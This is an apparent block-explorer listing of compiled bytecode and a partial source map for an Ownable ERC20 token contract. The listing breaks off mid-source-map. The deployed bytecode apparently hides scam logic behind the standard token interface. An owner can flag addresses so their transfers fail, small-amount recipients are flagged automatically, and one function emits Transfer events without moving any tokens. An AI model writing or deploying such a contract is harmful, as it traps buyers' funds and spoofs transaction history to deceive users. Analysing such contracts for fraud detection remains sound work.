fffffff1603610a7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7490611820565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610aeb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae2906118ae565b60405180910390fd5b8060045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610bc591906113d0565b60405180910390a3505050565b5f610bdd8484610862565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c575781811015610c49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4090611916565b60405180910390fd5b610c568484848403610a0f565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ccb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc2906119a4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d39576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3090611a32565b60405180910390fd5b610d44838383611207565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490505f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082821015610e09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0090611ac0565b60405180910390fd5b82820360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508260015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680610f32575060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15610f8d576001151560065f9054906101000a900460ff16151514610f8c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8390611b01565b60405180910390fd5b5b80610f9661051e565b600a610fa29190611c4e565b108015610ff6575060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b1561105157600160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505b8373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516110ae91906113d0565b60405180910390a36110c185858561120c565b5050505050565b6110d0610a08565b73ffffffffffffffffffffffffffffffffffffffff166110ee610658565b73ffffffffffffffffffffffffffffffffffffffff1614611144576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113b90611ce2565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561124857808201518184015260208101905061122d565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61126d82611211565b611277818561121b565b935061128781856020860161122b565b61129081611253565b840191505092915050565b5f6020820190508181035f8301526112b38184611263565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6112ec826112c3565b9050919050565b6112fc816112e2565b8114611306575f80fd5b50565b5f81359050611317816112f3565b92915050565b5f819050919050565b61132f8161131d565b8114611339575f80fd5b50565b5f8135905061134a81611326565b92915050565b5f8060408385031215611366576113656112bb565b5b5f61137385828601611309565b92505060206113848582860161133c565b9150509250929050565b5f8115159050919050565b6113a28161138e565b82525050565b5f6020820190506113bb5f830184611399565b92915050565b6113ca8161131d565b82525050565b5f6020820190506113e35f8301846113c1565b92915050565b5f602082840312156113fe576113fd6112bb565b5b5f61140b84828501611309565b91505092915050565b5f805f6060848603121561142b5761142a6112bb565b5b5f61143886828701611309565b935050602061144986828701611309565b925050604061145a8682870161133c565b9150509250925092565b5f60ff82169050919050565b61147981611464565b82525050565b5f6020820190506114925f830184611470565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126114b9576114b8611498565b5b8235905067ffffffffffffffff8111156114d6576114d561149c565b5b6020830191508360208202830111156114f2576114f16114a0565b5b9250929050565b5f806020838503121561150f5761150e6112bb565b5b5f83013567ffffffffffffffff81111561152c5761152b6112bf565b5b611538858286016114a4565b92509250509250929050565b61154d816112e2565b82525050565b5f6020820190506115665f830184611544565b92915050565b5f8060408385031215611582576115816112bb565b5b5f61158f85828601611309565b92505060206115a085828601611309565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806115ee57607f821691505b602082108103611601576116006115aa565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61163e8261131d565b91506116498361131d565b925082820190508082111561166157611660611607565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6116ee60258361121b565b91506116f982611694565b604082019050919050565b5f6020820190508181035f83015261171b816116e2565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61177c60268361121b565b915061178782611722565b604082019050919050565b5f6020820190508181035f8301526117a981611770565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61180a60248361121b565b9150611815826117b0565b604082019050919050565b5f6020820190508181035f830152611837816117fe565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f61189860228361121b565b91506118a38261183e565b604082019050919050565b5f6020820190508181035f8301526118c58161188c565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611900601d8361121b565b915061190b826118cc565b602082019050919050565b5f6020820190508181035f83015261192d816118f4565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61198e60258361121b565b915061199982611934565b604082019050919050565b5f6020820190508181035f8301526119bb81611982565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611a1c60238361121b565b9150611a27826119c2565b604082019050919050565b5f6020820190508181035f830152611a4981611a10565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611aaa60268361121b565b9150611ab582611a50565b604082019050919050565b5f6020820190508181035f830152611ad781611a9e565b9050919050565b50565b5f611aec5f8361121b565b9150611af782611ade565b5f82019050919050565b5f6020820190508181035f830152611b1881611ae1565b9050919050565b5f8160011c9050919050565b5f808291508390505b6001851115611b7457808604811115611b5057611b4f611607565b5b6001851615611b5f5780820291505b8081029050611b6d85611b1f565b9450611b34565b94509492505050565b5f82611b8c5760019050611c47565b81611b99575f9050611c47565b8160018114611baf5760028114611bb957611be8565b6001915050611c47565b60ff841115611bcb57611bca611607565b5b8360020a915084821115611be257611be1611607565b5b50611c47565b5060208310610133831016604e8410600b8410161715611c1d5782820a905083811115611c1857611c17611607565b5b611c47565b611c2a8484846001611b2b565b92509050818404811115611c4157611c40611607565b5b81810290505b9392505050565b5f611c588261131d565b9150611c6383611464565b9250611c907fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611b7d565b905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611ccc60208361121b565b9150611cd782611c98565b602082019050919050565b5f6020820190508181035f830152611cf981611cc0565b905091905056fea264697066735822122037ba3582166a9eec714c35ee00c1656ab9433b8edd62cc2e2c5f2d2b94e751d664736f6c63430008160033

Deployed Bytecode

0x608060405234801561000f575f80fd5b506004361061011f575f3560e01c8063715018a6116100ab578063beabacc81161006f578063beabacc81461032f578063c0806db61461034b578063dd62ed3e1461037b578063f2fde38b146103ab578063fe1da5df146103c75761011f565b8063715018a6146102895780638da5cb5b1461029357806395d89b41146102b1578063a457c2d7146102cf578063a9059cbb146102ff5761011f565b806323b872dd116100f257806323b872dd146101bf578063313ce567146101ef578063395093511461020d5780634d3c26e01461023d57806370a08231146102595761011f565b806306fdde0314610123578063095ea7b31461014157806318160ddd1461017157806321860a051461018f575b5f80fd5b61012b6103e3565b604051610138919061129b565b60405180910390f35b61015b60048036038101906101569190611350565b610473565b60405161016891906113a8565b60405180910390f35b610179610495565b60405161018691906113d0565b60405180910390f35b6101a960048036038101906101a491906113e9565b61049e565b6040516101b691906113a8565b60405180910390f35b6101d960048036038101906101d49190611414565b6104f0565b6040516101e691906113a8565b60405180910390f35b6101f761051e565b604051610204919061147f565b60405180910390f35b61022760048036038101906102229190611350565b610526565b60405161023491906113a8565b60405180910390f35b610257600480360381019061025291906114f9565b61055c565b005b610273600480360381019061026e91906113e9565b6105ff565b60405161028091906113d0565b60405180910390f35b610291610645565b005b61029b610658565b6040516102a89190611553565b60405180910390f35b6102b961067f565b6040516102c6919061129b565b60405180910390f35b6102e960048036038101906102e49190611350565b61070f565b6040516102f691906113a8565b60405180910390f35b61031960048036038101906103149190611350565b610784565b60405161032691906113a8565b60405180910390f35b61034960048036038101906103449190611414565b6107a6565b005b610365600480360381019061036091906113e9565b610810565b60405161037291906113a8565b60405180910390f35b6103956004803603810190610390919061156c565b610862565b6040516103a291906113d0565b60405180910390f35b6103c560048036038101906103c091906113e9565b6108e4565b005b6103e160048036038101906103dc91906114f9565b610966565b005b6060600780546103f2906115d7565b80601f016020809104026020016040519081016040528092919081815260200182805461041e906115d7565b80156104695780601f1061044057610100808354040283529160200191610469565b820191905f5260205f20905b81548152906001019060200180831161044c57829003601f168201915b5050505050905090565b5f8061047d610a08565b905061048a818585610a0f565b600191505092915050565b5f600554905090565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f806104fa610a08565b9050610507858285610bd2565b610512858585610c5d565b60019150509392505050565b5f6012905090565b5f80610530610a08565b90506105518185856105428589610862565b61054c9190611634565b610a0f565b600191505092915050565b6105646110c8565b5f5b828290508110156105fa57600160035f85858581811061058957610588611667565b5b905060200201602081019061059e91906113e9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080600101915050610566565b505050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61064d6110c8565b6106565f611146565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606008805461068e906115d7565b80601f01602080910402602001604051908101604052809291908181526020018280546106ba906115d7565b80156107055780601f106106dc57610100808354040283529160200191610705565b820191905f5260205f20905b8154815290600101906020018083116106e857829003601f168201915b5050505050905090565b5f80610719610a08565b90505f6107268286610862565b90508381101561076b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161076290611704565b60405180910390fd5b6107788286868403610a0f565b60019250505092915050565b5f8061078e610a08565b905061079b818585610c5d565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161080391906113d0565b60405180910390a3505050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6108ec6110c8565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361095a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161095190611792565b60405180910390fd5b61096381611146565b50565b61096e6110c8565b5f5b82829050811015610a03575f60025f85858581811061099257610991611667565b5b90506020020160208101906109a791906113e9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080600101915050610970565b505050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a7490611820565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610aeb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae2906118ae565b60405180910390fd5b8060045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610bc591906113d0565b60405180910390a3505050565b5f610bdd8484610862565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c575781811015610c49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4090611916565b60405180910390fd5b610c568484848403610a0f565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ccb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc2906119a4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d39576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3090611a32565b60405180910390fd5b610d44838383611207565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490505f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082821015610e09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0090611ac0565b60405180910390fd5b82820360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508260015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680610f32575060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15610f8d576001151560065f9054906101000a900460ff16151514610f8c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8390611b01565b60405180910390fd5b5b80610f9661051e565b600a610fa29190611c4e565b108015610ff6575060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b1561105157600160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505b8373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516110ae91906113d0565b60405180910390a36110c185858561120c565b5050505050565b6110d0610a08565b73ffffffffffffffffffffffffffffffffffffffff166110ee610658565b73ffffffffffffffffffffffffffffffffffffffff1614611144576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113b90611ce2565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561124857808201518184015260208101905061122d565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61126d82611211565b611277818561121b565b935061128781856020860161122b565b61129081611253565b840191505092915050565b5f6020820190508181035f8301526112b38184611263565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6112ec826112c3565b9050919050565b6112fc816112e2565b8114611306575f80fd5b50565b5f81359050611317816112f3565b92915050565b5f819050919050565b61132f8161131d565b8114611339575f80fd5b50565b5f8135905061134a81611326565b92915050565b5f8060408385031215611366576113656112bb565b5b5f61137385828601611309565b92505060206113848582860161133c565b9150509250929050565b5f8115159050919050565b6113a28161138e565b82525050565b5f6020820190506113bb5f830184611399565b92915050565b6113ca8161131d565b82525050565b5f6020820190506113e35f8301846113c1565b92915050565b5f602082840312156113fe576113fd6112bb565b5b5f61140b84828501611309565b91505092915050565b5f805f6060848603121561142b5761142a6112bb565b5b5f61143886828701611309565b935050602061144986828701611309565b925050604061145a8682870161133c565b9150509250925092565b5f60ff82169050919050565b61147981611464565b82525050565b5f6020820190506114925f830184611470565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126114b9576114b8611498565b5b8235905067ffffffffffffffff8111156114d6576114d561149c565b5b6020830191508360208202830111156114f2576114f16114a0565b5b9250929050565b5f806020838503121561150f5761150e6112bb565b5b5f83013567ffffffffffffffff81111561152c5761152b6112bf565b5b611538858286016114a4565b92509250509250929050565b61154d816112e2565b82525050565b5f6020820190506115665f830184611544565b92915050565b5f8060408385031215611582576115816112bb565b5b5f61158f85828601611309565b92505060206115a085828601611309565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806115ee57607f821691505b602082108103611601576116006115aa565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61163e8261131d565b91506116498361131d565b925082820190508082111561166157611660611607565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6116ee60258361121b565b91506116f982611694565b604082019050919050565b5f6020820190508181035f83015261171b816116e2565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61177c60268361121b565b915061178782611722565b604082019050919050565b5f6020820190508181035f8301526117a981611770565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61180a60248361121b565b9150611815826117b0565b604082019050919050565b5f6020820190508181035f830152611837816117fe565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f61189860228361121b565b91506118a38261183e565b604082019050919050565b5f6020820190508181035f8301526118c58161188c565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611900601d8361121b565b915061190b826118cc565b602082019050919050565b5f6020820190508181035f83015261192d816118f4565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61198e60258361121b565b915061199982611934565b604082019050919050565b5f6020820190508181035f8301526119bb81611982565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611a1c60238361121b565b9150611a27826119c2565b604082019050919050565b5f6020820190508181035f830152611a4981611a10565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611aaa60268361121b565b9150611ab582611a50565b604082019050919050565b5f6020820190508181035f830152611ad781611a9e565b9050919050565b50565b5f611aec5f8361121b565b9150611af782611ade565b5f82019050919050565b5f6020820190508181035f830152611b1881611ae1565b9050919050565b5f8160011c9050919050565b5f808291508390505b6001851115611b7457808604811115611b5057611b4f611607565b5b6001851615611b5f5780820291505b8081029050611b6d85611b1f565b9450611b34565b94509492505050565b5f82611b8c5760019050611c47565b81611b99575f9050611c47565b8160018114611baf5760028114611bb957611be8565b6001915050611c47565b60ff841115611bcb57611bca611607565b5b8360020a915084821115611be257611be1611607565b5b50611c47565b5060208310610133831016604e8410600b8410161715611c1d5782820a905083811115611c1857611c17611607565b5b611c47565b611c2a8484846001611b2b565b92509050818404811115611c4157611c40611607565b5b81810290505b9392505050565b5f611c588261131d565b9150611c6383611464565b9250611c907fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611b7d565b905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611ccc60208361121b565b9150611cd782611c98565b602082019050919050565b5f6020820190508181035f830152611cf981611cc0565b905091905056fea264697066735822122037ba3582166a9eec714c35ee00c1656ab9433b8edd62cc2e2c5f2d2b94e751d664736f6c63430008160033

Deployed Bytecode Sourcemap

1193:133:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2174:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5366:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3469:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3811;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6125:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3111:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6806:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4134:207;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3633:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:0;;;:::i;:::-;;1834:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2385:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7527:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4662:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3292:117;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4347:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4909:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2707:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3927:197:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2174:98;2228:13;2260:5;2253:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2174:98;:::o;5366:197::-;5449:4;5465:13;5481:12;:10;:12::i;:::-;5465:28;;5503:32;5512:5;5519:7;5528:6;5503:8;:32::i;:::-;5552:4;5545:11;;;5366:197;;;;:::o;3469:106::-;3530:7;3556:12;;3549:19;;3469:106;:::o;3811:::-;3868:4;3891:8;:19;3900:9;3891:19;;;;;;;;;;;;;;;;;;;;;;;;;3884:26;;3811:106;;;:::o;6125:286::-;6252:4;6268:15;6286:12;:10;:12::i;:::-;6268:30;;6308:38;6324:4;6330:7;6339:6;6308:15;:38::i;:::-;6356:27;6366:4;6372:2;6376:6;6356:9;:27::i;:::-;6400:4;6393:11;;;6125:286;;;;;:::o;3111:91::-;3169:5;3193:2;3186:9;;3111:91;:::o;6806:234::-;6894:4;6910:13;6926:12;:10;:12::i;:::-;6910:28;;6948:64;6957:5;6964:7;7001:10;6973:25;6983:5;6990:7;6973:9;:25::i;:::-;:38;;;;:::i;:::-;6948:8;:64::i;:::-;7029:4;7022:11;;;6806:234;;;;:::o;4134:207::-;1727:13:0;:11;:13::i;:::-;4228:9:1::1;4223:112;4247:11;;:18;;4243:1;:22;4223:112;;;4320:4;4286:15;:31;4302:11;;4314:1;4302:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;4286:31;;;;;;;;;;;;;;;;:38;;;;;;;;;;;;;;;;;;4267:3;;;;;;;4223:112;;;;4134:207:::0;;:::o;3633:125::-;3707:7;3733:9;:18;3743:7;3733:18;;;;;;;;;;;;;;;;3726:25;;3633:125;;;:::o;2457:101:0:-;1727:13;:11;:13::i;:::-;2521:30:::1;2548:1;2521:18;:30::i;:::-;2457:101::o:0;1834:85::-;1880:7;1906:6;;;;;;;;;;;1899:13;;1834:85;:::o;2385:102:1:-;2441:13;2473:7;2466:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2385:102;:::o;7527:427::-;7620:4;7636:13;7652:12;:10;:12::i;:::-;7636:28;;7674:24;7701:25;7711:5;7718:7;7701:9;:25::i;:::-;7674:52;;7764:15;7744:16;:35;;7736:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;7855:60;7864:5;7871:7;7899:15;7880:16;:34;7855:8;:60::i;:::-;7943:4;7936:11;;;;7527:427;;;;:::o;4662:189::-;4741:4;4757:13;4773:12;:10;:12::i;:::-;4757:28;;4795;4805:5;4812:2;4816:6;4795:9;:28::i;:::-;4840:4;4833:11;;;4662:189;;;;:::o;3292:117::-;3392:3;3376:26;;3385:5;3376:26;;;3397:4;3376:26;;;;;;:::i;:::-;;;;;;;;3292:117;;;:::o;4347:119::-;4410:4;4433:15;:26;4449:9;4433:26;;;;;;;;;;;;;;;;;;;;;;;;;4426:33;;4347:119;;;:::o;4909:149::-;4998:7;5024:11;:18;5036:5;5024:18;;;;;;;;;;;;;;;:27;5043:7;5024:27;;;;;;;;;;;;;;;;5017:34;;4909:149;;;;:::o;2707:198:0:-;1727:13;:11;:13::i;:::-;2815:1:::1;2795:22;;:8;:22;;::::0;2787:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2870:28;2889:8;2870:18;:28::i;:::-;2707:198:::0;:::o;3927:197:1:-;1727:13:0;:11;:13::i;:::-;4017:9:1::1;4012:106;4036:11;;:18;;4032:1;:22;4012:106;;;4102:5;4075:8;:24;4084:11;;4096:1;4084:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;4075:24;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;4056:3;;;;;;;4012:106;;;;3927:197:::0;;:::o;587:96:0:-;640:7;666:10;659:17;;587:96;:::o;12055:370:1:-;12203:1;12186:19;;:5;:19;;;12178:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12283:1;12264:21;;:7;:21;;;12256:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12365:6;12335:11;:18;12347:5;12335:18;;;;;;;;;;;;;;;:27;12354:7;12335:27;;;;;;;;;;;;;;;:36;;;;12402:7;12386:32;;12395:5;12386:32;;;12411:6;12386:32;;;;;;:::i;:::-;;;;;;;;12055:370;;;:::o;12706:441::-;12836:24;12863:25;12873:5;12880:7;12863:9;:25::i;:::-;12836:52;;12922:17;12902:16;:37;12898:243;;12983:6;12963:16;:26;;12955:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;13065:51;13074:5;13081:7;13109:6;13090:16;:25;13065:8;:51::i;:::-;12898:243;12826:321;12706:441;;;:::o;8408:1027::-;8550:1;8534:18;;:4;:18;;;8526:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8626:1;8612:16;;:2;:16;;;8604:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;8679:38;8700:4;8706:2;8710:6;8679:20;:38::i;:::-;8728:19;8750:9;:15;8760:4;8750:15;;;;;;;;;;;;;;;;8728:37;